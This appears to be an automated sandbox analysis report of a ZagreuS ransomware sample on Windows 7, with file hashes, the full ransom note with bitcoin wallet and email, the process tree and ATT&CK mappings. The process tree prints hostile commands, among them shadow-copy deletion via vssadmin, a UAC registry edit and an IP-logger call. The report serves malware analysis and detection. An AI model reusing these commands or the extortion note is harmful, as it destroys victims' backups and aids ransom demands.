Analysis

  • max time kernel
    142s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 09:34

General

  • Target

    ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe

  • Size

    750KB

  • MD5

    0f081afaae11c154edb8df747d612f93

  • SHA1

    7b1478e64453d78ff60eda7b1d2cc3623d4a9210

  • SHA256

    ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858

  • SHA512

    4b76bd14bcdf5a5e0a73fe630dc430968d59a7c132b00cb9e12674ff6d6472a726b5ed7796fa1481eb7e7b2aacdbc356a3b028c2b3eb2cbd13af1650f3d20628

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\HELP_DECRYPT_YOUR_FILES.txt

Ransom Note
Oops All Of your important files were encrypted Like document pictures videos etc.. Don't worry, you can return all your files! All your files, documents, photos, databases and other important files are encrypted by a strong encryption. How to recover files? RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key. The only method of recovering files is to purchase an unique private key.Only we can give you this key and only we can recover your files. What guarantees you have? As evidence, you can send us 1 file to decrypt by email We will send you a recovery file Prove that we can decrypt your file Please You must follow these steps carefully to decrypt your files: Send $1000 worth of bitcoin to wallet: bc1qtc9dpp69th34m5dsuadhparzmt9qqr7sukuw93 after payment,we will send you Decryptor software contact email: uncrushman@protonmail.com Your personal ID: m4MhIJx65io3E7O40DGe0n1THcuMQxIIewKUKjawYlQbxYgRtn4nAMYEf/3E/IyFruptIcfMoXaA04HF50BTQUk5cx3iDQ0LwwhXkJ+jmM9BX96Gx75thNCKm66GKILIWnGp6QI4kYbSuJk2eUyGPChb23SWrV8Bb9A4rYwgepU=
Emails

uncrushman@protonmail.com

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Generic Ransomware Note 11 IoCs

    Ransomware often writes a note containing information on how to pay the ransom.

  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
    "C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
      "C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1052
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:1636
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:664
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:1512
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2Y1Gy5
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1060 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1948
    • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf"
      2⤵
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      PID:1764
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1340
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:1968

Network

MITRE ATT&CK Matrix ATT&CK v6

Privilege Escalation

Bypass User Account Control

1
T1088

Defense Evasion

Bypass User Account Control

1
T1088

Disabling Security Tools

1
T1089

Modify Registry

3
T1112

File Deletion

2
T1107

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Impact

Inhibit System Recovery

2
T1490

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf
    Filesize

    519KB

    MD5

    f628a245651b09f63d2f888761d99543

    SHA1

    f004b9a7b6be37ba12d05167073cc2804b08ab64

    SHA256

    de51caa63ba814dc3aa4024a7ad2bf7b8e4ccdf7caf0f355857ab02a3d796bb6

    SHA512

    842b4cb2763df75215301213b705748cfd3377ce0dd467d7c9b6a8b7e3386964c1fb3fdef141b90c1012e76ebbef37e9759469b089c8d85db7cf9ca96ef2301d

  • C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
    Filesize

    27KB

    MD5

    961d5eab06ae737f0425824c5cdb92d9

    SHA1

    56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

    SHA256

    4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

    SHA512

    56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

  • C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
    Filesize

    27KB

    MD5

    961d5eab06ae737f0425824c5cdb92d9

    SHA1

    56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

    SHA256

    4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

    SHA512

    56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6I9G92W5.txt
    Filesize

    605B

    MD5

    9fe3383fe866ac30958cfb27a720bad5

    SHA1

    045a942300977b237aca9a902a87f4ad0cb34b6d

    SHA256

    4ee227a761fb706173f6caca871b2d0b68bf87cb4e3f7ca0916d97a7393dfa5a

    SHA512

    17a13616c617f0c1b22456346923f2ce856e7e1d2e6b0a8ce09fe663a901db1d8ffb85c6c5e9ad7f96e88bd5fc14c9742f097000b1c4f948db82d79f861514ab

  • C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
    Filesize

    1KB

    MD5

    ea4ae25750a7af617159abde94d61e59

    SHA1

    f31c8f9ea2d2468fcb2a164712edbc9e0b2d4ba2

    SHA256

    73e50c956d403d060a6c0a193caa17bb641c06785b06285729929efcbdba3c02

    SHA512

    7c5f949ccd35ac77131ab528d3d2d95e6ae8899ba0e665036370eb9a5cf5557fefdd865e5c59a52795891903f968512a83efbe37edecb03c57c8573c757cf03a

  • \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
    Filesize

    27KB

    MD5

    961d5eab06ae737f0425824c5cdb92d9

    SHA1

    56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

    SHA256

    4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

    SHA512

    56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

  • \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
    Filesize

    27KB

    MD5

    961d5eab06ae737f0425824c5cdb92d9

    SHA1

    56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

    SHA256

    4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

    SHA512

    56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

  • \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
    Filesize

    27KB

    MD5

    961d5eab06ae737f0425824c5cdb92d9

    SHA1

    56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

    SHA256

    4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

    SHA512

    56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

  • \Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
    Filesize

    27KB

    MD5

    961d5eab06ae737f0425824c5cdb92d9

    SHA1

    56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

    SHA256

    4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

    SHA512

    56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

  • memory/520-59-0x0000000000000000-mapping.dmp
  • memory/520-65-0x000007FEFB671000-0x000007FEFB673000-memory.dmp
    Filesize

    8KB

  • memory/520-64-0x0000000000FA0000-0x0000000000FAC000-memory.dmp
    Filesize

    48KB

  • memory/664-68-0x0000000000000000-mapping.dmp
  • memory/1052-66-0x0000000000000000-mapping.dmp
  • memory/1380-67-0x0000000000000000-mapping.dmp
  • memory/1512-72-0x0000000000000000-mapping.dmp
  • memory/1612-71-0x0000000000000000-mapping.dmp
  • memory/1636-69-0x0000000000000000-mapping.dmp
  • memory/1764-62-0x0000000000000000-mapping.dmp
  • memory/1808-54-0x0000000075BD1000-0x0000000075BD3000-memory.dmp
    Filesize

    8KB